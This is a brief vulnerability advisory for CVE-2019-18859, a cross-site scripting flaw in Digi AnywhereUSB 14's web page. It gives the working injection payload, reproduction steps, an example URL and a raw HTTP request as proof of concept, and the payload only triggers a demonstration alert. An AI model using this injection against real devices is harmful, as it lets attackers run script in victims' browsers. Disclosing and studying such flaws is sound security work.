CVE-2019-18859: Cross Site Scripting (XSS) Vulnerability

Vulnerability Type: Cross Site Scripting (XSS) Vulnerability

Vendor of Product: Digi International

Affected Product Code Base: AnywhereUSB - 14

Firmware Version: 1.93.21.19

Description: Digi AnywhereUSB 14 allows XSS via a link for the Digi Page.

Attack Vectors: Someone must open a link for the Digi Page

Attack Type: Remote

Payload: //–></SCRIPT>">’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Steps To Reproduce

1. Browse the Web Page of the Digi’s AnywhereUSB and trying not to log in

2.You can create your malicious payload like the following and run your arbitrary JavaScript code on the browser’s of the victim

Example: http://<IP Address of the Digi Anywhere USB>///–></SCRIPT>">’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

#PoC

GET //–></SCRIPT>">’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1

Host: Target IP

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1